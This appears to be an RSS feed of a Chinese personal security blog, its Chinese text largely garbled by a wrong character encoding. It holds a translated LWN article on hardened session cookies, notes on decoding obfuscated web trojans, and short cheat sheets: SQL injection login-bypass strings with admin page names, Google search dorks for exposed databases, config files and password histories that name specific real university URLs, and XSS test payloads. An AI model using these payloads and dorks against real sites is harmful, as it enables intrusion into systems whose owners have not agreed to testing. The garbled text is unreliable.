锘??xml version="1.0" encoding="utf-8" standalone="yes"?>亚洲日韩欧美视频一区,欧美一级片一区,国产精品剧情在线亚洲http://m.shnenglu.com/momoxiao/category/12536.htmlzh-cnSun, 09 Oct 2011 23:04:25 GMTSun, 09 Oct 2011 23:04:25 GMT60Session cookies for web applicationshttp://m.shnenglu.com/momoxiao/archive/2011/10/09/157836.html灝忛粯灝忛粯Sat, 08 Oct 2011 23:14:00 GMThttp://m.shnenglu.com/momoxiao/archive/2011/10/09/157836.htmlhttp://m.shnenglu.com/momoxiao/comments/157836.htmlhttp://m.shnenglu.com/momoxiao/archive/2011/10/09/157836.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/157836.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/157836.htmlSession cookies for web applications [http://lwn.net/Articles/283383/]
By Jake Edge
May 21, 2008

Two weeks ago on this page, we reported on some Wordpress vulnerabilities that were caused by incorrectly generating authentication cookies. The article was a bit light on details about such cookies, so this follow-up hopes to remedy that. In addition, Steven Murdoch, who discovered both of the holes, recently presented a paper on a new cookie technique that provides some additional safeguards over other schemes.

涓ゅ懆鍓嶅湪姝ら〉涓婏紝鎴戜滑鎶ラ亾浜嗙敱涓嶆紜敓鎴愮殑韜喚楠岃瘉 cookies 寮曡搗鐨勪竴浜?Wordpress 婕忔礊銆傞偅綃囨枃妗e榪欎簺 cookies 鐨勭粏鑺傛弿榪扮暐灝戯紝榪欑瘒鍚庣畫鐨勬枃绔犲笇鏈涜兘瑙e喅榪欎釜闂銆傚彟澶栵紝鍙戠幇榪欎簺婕忔礊鐨?Steven Murdoch錛屾渶榪戝彂琛ㄤ簡綃囧叧浜庝竴縐嶆柊鐨?cookie 鎶鏈殑鏂囩珷錛屾枃绔犳彁渚涗簡鍏朵粬鏂規涔媊涓奰鐨勪竴浜涢澶栦繚鎶ゆ帾鏂姐?br />
HTTP is a stateless protocol which means that any application that wishes to track multiple requests as a single session must provide its own way to link those requests. This is typically done through cookies, which are opaque blobs of data that are stored by browsers. Cookies are sent to the browser as part of an HTTP response, usually after some kind of authentication is successful. The browser associates the cookie with the URL of the site so that it can send the cookie value back to the server on each subsequent request.

HTTP 鏄竴縐嶆棤鐘舵佺殑鍗忚錛岃繖鎰忓懗鐫浠諱綍甯屾湜璺熻釜澶氫釜璇鋒眰浣滀負鍗曚釜浼氳瘽鐨勫簲鐢ㄧ▼搴忥紝蹇呴』鎻愪緵鑷繁鐨勬柟寮忔潵閾炬帴榪欎簺璇鋒眰銆傝繖閫氬父閫氳繃 cookies 鏉ュ畬鎴愶紝cookies 鏄祻瑙堝櫒瀛樺偍鐨勪笉閫忔槑鐨勬暟鎹潡銆傞氬父錛屽湪鏌愮韜喚璁よ瘉鎴愬姛鍚庯紝cookies 琚綔涓轟竴涓?HTTP 鍝嶅簲鐨勪竴閮ㄥ垎鍙戦佺粰嫻忚鍣ㄣ傛祻瑙堝櫒鎶?cookie 鍜屽搴旂綉绔欑殑 URL 鍏寵仈璧鋒潵錛屼互渚垮畠鍙互鍦ㄦ瘡涓悗緇姹備腑鍥為?cookie 鍊煎埌鏈嶅姟鍣ㄣ?br />
Servers can then use the value as a key into some kind of persistent storage so that all requests that contain that cookie value are treated as belonging to a particular session. In particular, it represents that the user associated with that session has correctly authenticated. The cookie lasts until it expires or is deleted by the user. When that happens, the user must re-authenticate to get a new cookie which also starts a new session. Users find this annoying if it happens too frequently, so expirations are often quite long.

鐒跺悗錛屾湇鍔″櫒鍙互`鐢ㄦ煇縐嶆寔涔呮у瓨鍌ㄧ殑閿甡浣跨敤璇ュ鹼紝浣垮緱鎵鏈夊寘鍚 cookie 鍊肩殑璇鋒眰錛岃瑙嗕負灞炰簬鍚屼竴涓壒瀹氫細璇濄傜壒鍒槸錛屽畠浠h〃鍜岃浼氳瘽鍏寵仈鐨勯偅涓凡緇忔紜氳繃韜喚楠岃瘉鐨勭敤鎴楓備竴涓?cookie 涓鐩村瓨鍦紝鐩村埌榪囨湡鎴栬鐢ㄦ埛鍒犻櫎銆傛鏃訛紝鐢ㄦ埛蹇呴』閲嶆柊榪涜韜喚楠岃瘉錛岃幏鍙栦竴涓柊 cookie錛屽悓鏃跺紑濮嬩竴涓柊浼氳瘽銆傚鏋滃畠鍙戠敓鐨勮繃浜庨綣侊紝浼氳鐢ㄦ埛鎰熷埌鎭間漢錛屾墍浠ュ埌鏈熸椂闂撮氬父鐩稿綋闀褲?br />
If the user explicitly logs out of the application, any server-side resources that are being used to store state information can be freed, but that is often not the case. Users will generally just close their browser (or tab) while still being logged in. It is also convenient for users to be allowed multiple concurrent sessions, generally from multiple computers, which will cause the number of sessions stored to be larger, perhaps much larger, than the number of users.

濡傛灉鐢ㄦ埛鏄懼紡鍦扮櫥鍑哄簲鐢ㄧ▼搴忥紝浠諱綍鐢ㄦ潵瀛樺偍鐘舵佷俊鎭殑鏈嶅姟鍣ㄧ璧勬簮浼氳閲婃斁錛屼絾鎯呭喌緇忓父涓嶆槸榪欐牱銆傜敤鎴烽氬父鍙槸鍏抽棴浠栦滑鐨勬祻瑙堝櫒錛堟垨鏍囩欏碉級錛屽綋浠嶅湪鐧誨綍鐘舵佹椂銆傝繖涔熷厑璁哥敤鎴鋒柟渚垮湴錛屼粠涓嶅悓鐨勮綆楁満涓婁嬌鐢ㄥ涓茍鍙戜細璇濄傝繖灝嗗鑷村瓨鍌ㄦ洿澶х殑浼氳瘽鏁伴噺錛屼篃璁告瘮鐢ㄦ埛鏁伴噺澶ц澶氥?br />
Applications could restrict the number of sessions allowed by a user, or ratchet the expiration value way down, but they typically do not for user convenience. This allows for a potential denial of service when an attacker creates so many sessions that the server runs out of persistent storage. For this reason, stateless session cookies [PDF][http://prisms.cs.umass.edu/~kevinfu/papers/webauth_tr.pdf] were created.

搴旂敤紼嬪簭鍙互闄愬埗鍏佽涓涓敤鎴蜂嬌鐢ㄧ殑浼氳瘽鏁幫紝鎴栬卄`錛屼絾瀹冧滑閫氬父涓嶆柟渚跨敤鎴蜂嬌鐢ㄣ傝繖鍏佽涓涓綔鍦ㄧ殑鎷掔粷鏈嶅姟錛屽綋涓涓敾鍑昏呭垱寤哄お澶氫細璇濓紝浠ヨ嚦浜庢湇鍔″櫒鐢ㄥ畬鎸佷箙鎬у瓨鍌ㄦ椂銆傚嚭浜庤繖涓師鍥狅紝鏃犵姸鎬佷細璇?cookies 琚垱寤恒?br />
Stateless session cookies store all of the state information in the cookie itself, so that the server need not keep anything in the database, filesystem, or memory. The data in the cookie must be encoded in such a way that they cannot be forged, otherwise attackers could create cookies that allow them access they should not have. This is essentially where Wordpress went wrong. By not implementing stateless session cookies correctly, a valid cookie for one user could be modified into a valid cookie for a different user.

鏃犵姸鎬佷細璇?cookies 鎶婃墍鏈夌姸鎬佷俊鎭瓨鍌ㄥ埌 cookie 鏈韓錛屼嬌鏈嶅姟鍣ㄤ笉闇瑕佸湪鏁版嵁搴撱佹枃浠剁郴緇熸垨鍐呭瓨涓繚瀛樹換浣曚俊鎭侰ookie 涓殑鏁版嵁蹇呴』浠ヤ笉鑳借浼犵殑鏂瑰紡緙栫爜錛屽惁鍒欐敾鍑昏呭彲浠ュ垱寤哄厑璁鎬粬浠闂笉搴旇璁塊棶鍐呭鐨?cookies 銆傚疄闄呬笂榪欏氨鏄?Wordpress 鍑洪棶棰樼殑鍦版柟銆傜敱浜庢病鏈夋紜嬌鐢ㄦ棤鐘舵佷細璇?cookies 錛屼竴涓敤鎴風殑鏈夋晥 cookie 鍙互琚慨鏀規垚鍙︿竴涓笉鍚岀敤鎴風殑鏈夋晥 cookie 銆?br />
A stateless session cookie has the state data and expiration "in the clear" followed by a secure hash (SHA-256 for example) of those same values along with a key known only by the server. When the server receives the cookie value, it can calculate the hash and if it matches, proceed to use the state information. Because the secret is not known, an attacker cannot create their own cookies with values of their choosing.

涓涓棤鐘舵佺殑浼氳瘽 cookie 鏈夌姸鎬佹暟鎹拰鏄庣‘鐨勫埌鏈熸椂闂達紝鍚庤窡涓涓畨鍏ㄥ搱甯屽鹼紙渚嬪 SHA-256錛夛紝璇ュ搱甯屽煎拰鍙湁鏈嶅姟鍣ㄧ煡閬撶殑涓涓敭`瀵瑰簲`銆傚綋鏈嶅姟鍣ㄦ帴鏀跺埌 cookie 鍊鹼紝浼氳綆楀搱甯屽鹼紝濡傛灉鍖歸厤錛岀戶緇嬌鐢ㄥ叾涓殑鐘舵佷俊鎭傜敱浜庤繖涓瘑閽ユ槸鏈煡鐨勶紝鏀誨嚮鑰呬笉鑳戒嬌鐢ㄤ粬浠夋嫨鐨勫煎垱寤鴻嚜宸辯殑 cookies 銆?br />
The other side of that coin is that an attacker can create spoofed cookies if they know the secret. Murdoch wanted to extend the concept such that even getting access to the secret, through a SQL injection or other web application flaw, would not feasibly allow an attacker to create a spoofed cookie. The result is hardened stateless session cookies [PDF][http://www.cl.cam.ac.uk/~sjm217/papers/protocols08cookies.pdf].

紜竵鐨勫彟涓闈㈡槸錛屽鏋滄敾鍑昏呯煡閬撳瘑閽ワ紝鍙互鍒涘緩嬈洪獥鎬х殑 cookies 銆侻urdoch 甯屾湜鎵╁睍姒傚康錛屼嬌寰楅氳繃 SQL 娉ㄥ叆鎴栧叾瀹?web 搴旂敤婕忔礊璁塊棶瀵嗛挜鍚庯紝鏀誨嚮鑰呬篃鏃犳硶鍒涘緩涓涓楠楁х殑 cookie銆傜粨鏋滃氨鏄己鍖栫殑鏃犵姸鎬佷細璇?cookies 銆?br />
The basic idea behind the scheme is to add an additional field to stateless session cookies that corresponds to an authenticator generated when an account is first set up. This authenticator is generated from the password at account creation by iteratively calculating the cryptographic hash of the password and a long salt value.

璇ユ柟妗堣儗鍚庣殑鍩烘湰鎬濊礬鏄紝緇欐棤鐘舵佷細璇?cookie 澧炲姞涓涓澶栫殑瀛楁錛岃繖涓瓧孌靛拰璐︽埛棣栨璁劇疆鏃剁敓鎴愮殑涓涓猔韜喚楠岃瘉鍣╜瀵瑰簲銆傝韓浠介獙璇佸櫒鐢卞垱寤鴻處鎴鋒椂鐨勫瘑鐮佺敓鎴愶紝鐢熸垚鏂規硶鏄紝榪唬璁$畻瀵嗙爜鐨勫姞瀵嗗搱甯屽拰涓涓暱 salt 鍊箋?br />
Salt is a random string—usually just a few characters long—that is added to a password before it gets hashed, then stored with the password in the clear. It is used to eliminate the use of rainbow tables to crack passwords. Hardened stateless session cookies use a 128-bit salt value, then repeatedly calculate HASH(prev|salt), where prev is the password the first time through and the hash value from the previous calculation on each subsequent iteration.

Salt 鏄竴涓殢鏈哄瓧絎︿覆——閫氬父鍙湁鍑犱釜瀛楃闀?#8212;—瀹冨湪琚綆楀搱甯屽煎墠娣誨姞鍒板瘑鐮佷腑錛岀劧鍚庝互鏄庢枃褰㈠紡鍜屽瘑鐮佷竴璧峰瓨鍌ㄣ傚畠鏄敤鏉ユ潨緇濅嬌鐢ㄥ僵铏硅〃鐮磋В瀵嗙爜鐨勩俙紜寲`鐨勬棤鐘舵佷細璇?cookies 浣跨敤128浣?salt 鍊鹼紝鐒跺悗榪唬璁$畻 HASH(prev|salt) 錛?鍏朵腑 prev 鍦ㄧ涓嬈¤凱浠f椂鏄瘑鐮侊紝鍦ㄤ互鍚庢瘡嬈¤凱浠d腑鏄笂嬈¤綆楃殑 hash 鍊箋?br />
The number of iterations is large, 256 for example, but not a secret. Once that value is calculated, it is hashed one last time, without the salt, and then stored in the user table as the authenticator. When the cookie value is created after a successful authentication, only the output of the iterative hash itself is placed in the cookie, not the authenticator that is stored in the database. Cookie verification then must do the standard stateless session cookie hash verification, to ensure that the values have not been manipulated, then hash the value in the cookie to verify against authenticator in the database.

榪唬嬈℃暟鏄釜澶х殑鍊鹼紝渚嬪256錛屼絾榪欎笉鏄繚瀵嗙殑銆傚艱璁$畻鍑烘潵鍚庯紝鍐嶄笉浣跨敤 salt 鍝堝笇涓嬈★紝鐒跺悗浣滀負韜喚楠岃瘉鍣ㄥ瓨鍌ㄥ埌鐢ㄦ埛琛ㄤ腑銆傚綋 cookie 閫氳繃涓嬈℃垚鍔熻璇佽鍒涘緩鍚庯紝鍙湁杈撳嚭鐨勮凱浠e搱甯屽艱淇濆瓨鍦?cookie 涓紝鑰屼笉淇濆瓨鏁版嵁搴撲腑鐨勮韓浠介獙璇佸櫒銆侰ookie 楠岃瘉蹇呴』榪涜鏍囧噯鐨勬棤鐘舵佷細璇?cookie 鍝堝笇楠岃瘉錛屾潵紜繚鍊兼病鏈夎淇敼榪囷紝鐒跺悗鍝堝笇 cookie 涓殑鍊煎拰鏁版嵁搴撲腑鐨勮韓浠介獙璇佸櫒瀵規瘮銆?br />
If it sounds complicated, it is; the performance of doing 256 hashes is also an issue, but it does protect against the secret key being lost. Because an attacker cannot calculate a valid authenticator value to put in the cookie (doing so would require breaking SHA-256), they cannot create their own spoofed cookies.

濡傛灉榪欏惉璧鋒潵寰堝鏉傦紝紜疄錛涜繘琛?56嬈″搱甯岀殑鎬ц兘涔熸槸涓涓棶棰橈紝浣嗗畠紜疄鑳介伩鍏嶅瘑閽ヤ涪澶便傚洜涓烘敾鍑昏呮棤娉曡綆椾竴涓湁鏁堢殑鐢ㄦ埛楠岃瘉鍣ㄦ斁榪?cookie 涓紙榪欐牱鍋氶渶瑕佺獊鐮?SHA-256錛夛紝鎵浠ヤ粬浠笉鑳藉垱寤鴻嚜宸辯殑嬈洪獥 cookie 銆?br />
While it is not clear that the overhead of all of these hash calculations is warranted, it is an interesting extension to the stateless session cookie scheme. In his paper, Murdoch mentions some variations that could be used to further increase the security of the technique.

鐩墠灝氫笉娓呮鎵鏈夎繖浜涘搱甯岃綆楃殑寮閿鏄惁鏈夊繀瑕侊紝榪欐槸涓涓墿灞曟棤鐘舵佷細璇?cookie 鐨勬湁瓚f柟妗堛傚湪浠栫殑鏂囩珷涓紝Murdoch 鎻愬埌浜嗕竴浜涘彲浠ヨ繘涓姝ユ彁楂樿鎶鏈畨鍏ㄦх殑鍙樺寲銆?br />

---
鍚庨潰娌$湅鏄庣櫧銆?br />鏃犵姸鎬佷細璇?cookie 涓殑瀵嗛挜鍙兘琚敾鍑昏呰幏鍙栵紝authenticator 涓轟粈涔堜笉鑳借鏀誨嚮鑰呰幏鍙栵紵鑾峰彇榪欎袱涓笢瑗跨殑闅懼害鏈夊尯鍒箞錛?br />
---
TODO
| hash salt
| 褰╄櫣琛?/div>

灝忛粯 2011-10-09 07:14 鍙戣〃璇勮
]]>
緗戦┈鎾姤urlhttp://m.shnenglu.com/momoxiao/archive/2010/08/20/124101.html灝忛粯灝忛粯Fri, 20 Aug 2010 07:48:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/08/20/124101.htmlhttp://m.shnenglu.com/momoxiao/comments/124101.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/08/20/124101.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/124101.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/124101.htmlhttp://log.mtian.net/
http://bbs.ikaka.com/showforum-20039.aspx
http://bbs.kafan.cn/forum-105-1.html



灝忛粯 2010-08-20 15:48 鍙戣〃璇勮
]]>
緗戦┈瑙e瘑澶ц鍫?/title><link>http://m.shnenglu.com/momoxiao/archive/2010/06/17/118073.html</link><dc:creator>灝忛粯</dc:creator><author>灝忛粯</author><pubDate>Thu, 17 Jun 2010 05:22:00 GMT</pubDate><guid>http://m.shnenglu.com/momoxiao/archive/2010/06/17/118073.html</guid><wfw:comment>http://m.shnenglu.com/momoxiao/comments/118073.html</wfw:comment><comments>http://m.shnenglu.com/momoxiao/archive/2010/06/17/118073.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://m.shnenglu.com/momoxiao/comments/commentRss/118073.html</wfw:commentRss><trackback:ping>http://m.shnenglu.com/momoxiao/services/trackbacks/118073.html</trackback:ping><description><![CDATA[form錛氱憺鏄熷崱鍗℃妧鏈ぞ鍖?br>by: networkedition<br>======================<br>==================<br>Document.write<br>瑙e瘑鏂規硶涔媋lert鏂規硶錛氬皢緗戦┈浠g爜涓殑document.write鏇挎崲涓篴lert銆?br>eg.寮瑰嚭瀵硅瘽妗?lt;script src=3.css></script><br>   灝嗘浠g爜綺樿創鑷砯reshow涓婃搷浣滃尯鍩燂紝鐐瑰嚮filter鎸夐挳錛屾暟鎹敹闆嗗尯3.css鏈ㄩ┈緗戝潃銆?br>   鐐瑰嚮3.css錛岃繘琛宑heck閾炬帴鑾峰彇緗戦〉婧愪唬鐮併?br>   瑙e瘑閫夐」鑷劧閫夋嫨alpha2錛岀偣鍑籨ecode榪涜瑙e瘑<br>   鐐瑰嚮UP鎸夐挳錛屽皢絎竴嬈¤В瀵嗙殑緇撴灉涓婄炕鑷充笂鎿嶄綔鍖哄煙榪涜絎簩嬈¤В瀵嗭紝瑙e瘑閫夐」閫夋嫨esc錛岃幏寰楃綉椹笅杞藉湴鍧<br>   鐐瑰嚮insert鎸夐挳錛屽皢瑙e瘑鍑虹殑緗戦┈鍦板潃鎻掑叆鏁版嵁鏀墮泦鍖?br>   鐐瑰嚮all鎸夐挳鍏ㄩ夛紝鍐嶇偣鍑籰og鎸夐挳錛屽皢瑙e瘑鍑烘棩蹇楁牸寮忓寲杈撳嚭銆?br><br>==================<br><br>Alpha2<br>璇ュ姞瀵嗘柟寮忕壒寰侊紝浠g爜寮澶?TYIIIIIIIIIIIIIIII<br>瑙e瘑鏂規硶錛氫竴嬈lpha2瑙e瘑錛屼竴嬈sc瑙e瘑<br><br>==================<br>shellcode<br>Shellcode緗戦┈鐗瑰緛錛氫互鐩稿悓鍒嗛殧絎︼紙涓鑸負%u錛夊垎闅旂殑4浣嶄竴緇勭殑鍗佸叚榪涘埗瀛楃涓層?br>瑙e瘑鏂規硶錛?br>-瀵逛簬鐩存帴浣跨敤%u鏉ュ垎闅旂殑shellcode錛岄氳繃涓ゆesc鍙互鐩存帴瑙e瘑鍑虹綉椹湴鍧銆?br>-瀵逛簬閫氳繃綾籹hellcode褰㈠紡鍔犲瘑鐨勭綉椹紝鍙互閫氳繃灝嗕唬鐮佽繘琛岄傚綋澶勭悊錛堝皢浠g爜鏇挎崲涓哄垎闅旂%u錛夛紝鍐嶈繘琛屼袱嬈sc瑙e瘑<br><br>==================<br>Base64<br><br>Base64鍔犲瘑鍘熺悊錛?鎽樿嚜灝忚仾澶х墰鐨勫崥瀹?<br><br>  鎶婃瘡涓変釜瀛楃錛屽叡24浣?榪涘埗鐨凙SCII鐮侊紝鎶樺垎鎴愯繛緇?涓?浣嶇殑ASCII鐮侊紝鍐嶅湪姣忎釜ASCII鐮佸墠闈㈣ˉ00鍙樻垚8浣嶏紝 鏈鍚庡搴斾竴涓爜琛ㄦ潵鍙樻垚緙栫爜瀛楃錛?br><br>鐮佽〃涓猴紙浠?锝?3鍒嗗埆渚濇瀵瑰簲錛夛細<br>0瀵瑰簲A………………………………………………………………………………63瀵瑰簲/<br>ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/<br>濡傛灉鏈鍚庝笉澶?浣嶆暟錛屽垯琛?錛岃繖鏃跺悗闈㈠搴旂殑緙栫爜鏄?#8220;=”<br>渚嬶細鍘熸枃錛?nbsp;               a                  b                c<br>銆銆ASCII鐮侊細    01100001 | 01100010 | 01100011<br>        鍒嗘垚4涓細    011000 | 010110 | 001001 | 100011<br>        琛ヨ凍浣嶆暟錛?00011000 | 00010110 | 00001001 | 00100011<br>        鏁板煎ぇ灝忥細        24                22                9                  35<br>        瀵瑰簲緙栫爜錛?nbsp;       Y                  W                J                  j<br>        緙栫爜緇撴灉錛?nbsp;   YWJj<br><br>        濡傛灉鍙湁ab涓や釜瀛楃錛屽垯絎笁涓瓧絎︾敤鍏?鏉ヤ唬鏇匡紝榪欐椂緇撴灉涓篩WI=<br>        鍏跺疄鎸夌収綆楁硶錛?瀵瑰簲鐨勭紪鐮佸叾瀹炰篃鍙互璁や負鏄負0錛屾墍浠Q==鍜孮QAA鐢ㄦ潵瑙e瘑鐨勮瘽錛岄兘鏄疉錛屼絾鏄悗闈㈣ˉ0鏃剁敤“=”鏄姞瀵嗙畻娉曡嚜宸辯殑璁劇疆錛屾墍浠ュ姞瀵嗙粨鏋滃彧鑳芥槸QQ==鑰屼笉浼氭槸QQAA<br>鐭ラ亾浜嗗姞瀵嗗師鐞嗭紝瑙e瘑鍘熺悊灝卞弽鍏墮亾鑰岃涔嬪氨琛屼簡錛屽懙鍛?#8230;…<br>-----------------<br>鍔犲瘑鐗瑰緛錛?br><br>    澶у皬鍐欏瓧姣嶅強鏁板瓧娣鋒帓錛屾湯灝懼彲鑳藉寘鍚瓑鍙?br>------------------<br>Base64瑙e瘑鏂規硶錛?br><br>    鎴戜滑榪樻槸浠ヤ竴涓疄渚嬫潵綆鍗曡瑙ase64瑙e瘑鏂規硶錛屽湪瀹為檯鐨勭綉椹В瀵嗕腑錛岃繖縐嶅姞瀵嗘柟寮忓緢灝戣銆備粖澶╂垜浠彁渚涗竴縐嶈В瀵嗙殑鏂規硶錛屽湪榪欓噷鐢ㄥ埌鐨勮В瀵嗗伐鍏蜂負錛歯otepad++ 榪欎釜杞歡(闄勪歡涓簄otepad++)銆傚悗緇垜浠繕浼氳瑙d嬌鐢ㄤ竴浜涘叾浠栫殑瑙e瘑宸ュ叿鏉ヨВ瀵哹ase64銆?br> <br><br>======================<br>US-ASCII<br>鍔犲瘑鐗瑰緛錛氫唬鐮佺被浼兼眽瀛楋紝涓斾唬鐮佷腑鍖呭惈鏈?lt;meta http-equiv="Content-Type" content="text/html; charset=US-ASCII" /><br>瑙e瘑鏂規硶錛氫嬌鐢╢reshow宸ュ叿瑙e瘑鏃訛紝瑙e瘑閫夐」閫夋嫨US-ASCII,鐩存帴涓嬈ecode鍗沖彲<br><br>=====================<br>eval<br>瑙e瘑鏂規硶錛歮alzilla->Decode->Run script<br><br>=====================<br>swf<br><br>Flash緗戦┈綆浠嬶細flash緗戦┈鏄埄鐢ˋdobe Flash Player鎾斁鍣ㄤ弗閲嶅畨鍏ㄦ紡媧烇紝 鏀誨嚮鑰呭彲浠ラ氳繃綺懼績璁捐鐨勭壒孌奡WF鏂囦歡瀹炴柦鏀誨嚮銆傛祻瑙堣繖浜涚壒孌婃瀯閫犵殑SWF鏂囦歡錛屼細榪愯鏀誨嚮鑰呰瀹氱殑浠繪剰浠g爜銆?br><br>Flash緗戦┈瑙e瘑鏂規硶錛氫粖澶╂垜浠富瑕佹潵璁茶В濡備綍鍒╃敤(HTMLDecoder)宸ュ叿錛屽flash緗戦┈榪涜瑙e瘑銆傛宸ュ叿鐢卞皬紲ュぇ鐗涘紑鍙戠殑涓嬈捐嚜鍔ㄧ綉椹В瀵嗗伐鍏鳳紝鍐呴檮鏈塮lash緗戦┈瑙e瘑鍔熻兘錛屽湪榪欓噷瀹d紶涓涓嬪皬紲ュぇ鐗涘搱銆傚伐鍏蜂笅杞借闄勪歡錛屾湰嬈¤瑙d笉鎻愪緵鍏蜂綋鐨剆wf鏂囦歡涓嬭澆錛岄槻姝竴浜涚綉鍙嬩笉鏄庯紝鑳′貢榪愯瀵艱嚧緋葷粺涓瘨銆備富瑕佽瑙e浜巉lash緗戦┈濡備綍瑙e瘑鐨勬柟娉?<br><br>鍔熻兘-鎵ц錛欰>PDF/CWS/Zlib Extractor    <br><br>======================<br>PDF<br><br>pdf婕忔礊綆浠嬶細PDF鏄敱“Adobe Acrobat”鍒朵綔鐨勶紝瀹冨瓨鍦ㄤ竴涓敾鍑繪紡媧炩斺斿彲浠ュ湪PDF鏂囨。涓紝鍒╃敤“Adobe Acrobat”鎻愪緵鐨凧avascript鑴氭湰鍔熻兘錛屾墽琛屼換鎰忔敾鍑誨懡浠ゃ?br>瑙e瘑鏂規硶錛歱df緗戦┈鍜宻wf緗戦┈涓鏍鳳紝瑙e瘑宸ュ叿閮芥槸鍙互浣跨敤htmldecoder宸ュ叿錛岃В瀵嗘柟娉曞拰緗戦┈瑙e瘑楂樼駭綃?SWF瑙e瘑)涓鏍楓備粖澶╄瑙g殑榪欎釜pdf緗戦┈錛屽彲浠ョ洿鎺ヤ嬌鐢╢reshow榪欎釜宸ュ叿鏉ヨВ瀵嗭紝鍥犱負榪欎釜pdf鍖呭惈鐨剆hellcode鐩存帴鍙互閫氳繃璁頒簨鏈湅鍒般傚皬鎶宸э細瀵逛簬pdf鎴杝wf鏍煎紡鐨勬枃浠舵垜浠彲浠ラ氳繃璁頒簨鏈殑鏂瑰紡鎵撳紑錛岀洿鎺ユ煡鐪嬫枃浠剁殑婧愪唬鐮侊紝浣犱細鏈夋儕濂囩殑鍙戠幇錛屽挨鍏舵槸緗戦┈瑙e瘑錛岄噷闈㈣涓嶅畾灝辨湁浣犺鐨勭綉椹湴鍧鍛紝鍛靛懙銆傛湰嬈¤瑙e悓鏍蜂笉鎻愪緵pdf鏂囦歡鐨勪笅杞斤紝浠ュ厤涓嶆槑緗戝弸錛屼笅杞藉悗榪愯鑰屽鑷寸郴緇熶腑鎷涖?br><br>.pdf婧愭枃浠朵腑澶嶅埗鍑烘潵鐨剆hellcode浠g爜--甯﹀瘑閽ョ殑shellcode--FreShow<br><br><br> <img src ="http://m.shnenglu.com/momoxiao/aggbug/118073.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://m.shnenglu.com/momoxiao/" target="_blank">灝忛粯</a> 2010-06-17 13:22 <a href="http://m.shnenglu.com/momoxiao/archive/2010/06/17/118073.html#Feedback" target="_blank" style="text-decoration:none;">鍙戣〃璇勮</a></div>]]></description></item><item><title>'or'='or'緇忓吀婕忔礊鏀誨嚮http://m.shnenglu.com/momoxiao/archive/2010/05/15/115426.html灝忛粯灝忛粯Fri, 14 May 2010 23:52:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115426.htmlhttp://m.shnenglu.com/momoxiao/comments/115426.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115426.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/115426.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/115426.html/**
 *甯歌妯″紡
**/
'or'='or'
a'or'1=1--
'or 1=1--
"or 1=1--
or 1=1--
'or'a'='a
"or"a'='a
"or"a'='a
')or('a'='a

/**
 *鍚庡彴鏂囦歡甯歌鏂囦歡鍚?br>**/
admin
ad_login
ad_manage
addmember
adduser
adm_login
admin/admin
admin/admin_login
admin/index
admin/manage
adimin_admin
admin_edit
admin_index
admin_Login
login/...
...

/**
 *鍏抽敭瀛?br>**/
瀵嗙爜銆佺敤鎴峰悕銆佸悗鍙拌處鍙楓佷細鍛樸佷細鍛業D銆乽sername銆乸assword銆傘傘?/p>

/**
 *渚嬪瓙
**/
intext:鐢ㄦ埛鍚?inurl:admin/login.asp



灝忛粯 2010-05-15 07:52 鍙戣〃璇勮
]]>
google hackhttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115425.html灝忛粯灝忛粯Fri, 14 May 2010 23:50:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115425.htmlhttp://m.shnenglu.com/momoxiao/comments/115425.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115425.html#Feedback1http://m.shnenglu.com/momoxiao/comments/commentRss/115425.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/115425.html/**
  *璇硶
**/
allintext:楠岃瘉鐮?4800
allintitle:鍚庡彴鐧婚檰
cache:bit.edu.cn  //鐜板湪涓嶈兘鐢ㄤ簡璨屼技
define:html
filetype:pdf
info:bit.edu.cn
allinurl:movie  //榪欎釜涔熺敤涓嶄簡
link:nsfocus.com
site:nsfocus.com
related:nsfocus.com ///
-----
blue grass      //閫昏緫涓?br>blue -grass     //闈?br>blue or grass
"blue grass"
"bl?e gr?s"
blue grass +com
-----
http://www.googlesyndicatedsearch.com/u/berkeley

/**
 *鍏ヤ鏡
**/
緇濆鐨勮礬寰?杈撳叆淇濆瓨鐨勮礬寰?杈撳叆鏂囦歡鐨勫唴瀹?inurl:diy.asp
inurl:asp?id=
inurl:php?id= site:sohu.com
to parent directory inurl:inetpub
to parent directory mdb -google

///eg
//filetype:mdb
http://proisk.ru/Northwind.mdb

//to parent directory mdb site:edu.cn
http://netcourse.cug.edu.cn:7310/cug/fire_control/INC/_VTI_CNF/
http://netcourse.cug.edu.cn:7310

//to parent directory "conn.asp" site:edu.cn
http://www.tijmu.edu.cn/cn/dxzhx/new/admin/

//inurl:/inc+conn.asp
------

/**
 *闃茶寖-----robot.txt
**/
intext:"User-agent:*" inurl:robot.txt
intext:"Mediapartners-Google" inurl:"robots.txt"
intext:"Disallow:" inurl:robots.txt
intext:"Allow:" inurl"robots.txt"

 

/**
 *甯哥敤
**/
allinurl:bbs data
filetype:mdb inurl:database/data
filetype:inc conn
intitile:"index of" data/sh_history/bash_history/passwd



灝忛粯 2010-05-15 07:50 鍙戣〃璇勮
]]>
銆愯漿銆戣法绔?渚嬪瓙http://m.shnenglu.com/momoxiao/archive/2010/05/15/115424.html灝忛粯灝忛粯Fri, 14 May 2010 23:50:00 GMThttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115424.htmlhttp://m.shnenglu.com/momoxiao/comments/115424.htmlhttp://m.shnenglu.com/momoxiao/archive/2010/05/15/115424.html#Feedback0http://m.shnenglu.com/momoxiao/comments/commentRss/115424.htmlhttp://m.shnenglu.com/momoxiao/services/trackbacks/115424.html[1] >'><script>alert('Watchfire XSS Test Successful')</script>
[2] >"><script>alert("Watchfire XSS Test Successful")</script>
[3] </TextArea><script>alert('Watchfire XSS Test Successful')</script>
///鍥劇墖璺ㄧ珯
